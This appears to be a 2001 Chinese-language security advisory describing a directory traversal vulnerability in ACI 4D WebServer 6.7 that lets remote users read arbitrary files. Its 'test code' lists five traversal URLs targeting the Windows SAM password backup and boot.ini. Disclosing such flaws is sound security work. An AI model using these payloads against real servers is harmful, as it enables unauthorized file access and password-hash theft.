ACI 4D WebServer 存在目录遍历漏洞发布时间:2001-08-21 更新时间:2001-08-21 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 ACI 4D 6.7详细描述 ACI 4D webserver是运行在NT平台上的服务程序,其中存在目录遍历漏洞,可以导致远程用户查看任意系统文件。 测试代码 http://host + 下面的URLS /4DBin/_/C:/winnt/repair/sam._ /4DBin/_/../winnt/repair/sam._ /4DBin/_/C:/inetpub/../boot.ini /4DBin/_/../boot.ini /4DBin/_/../inetpub/../boot.ini 解决方案 尚无 相关信息 尚无 |
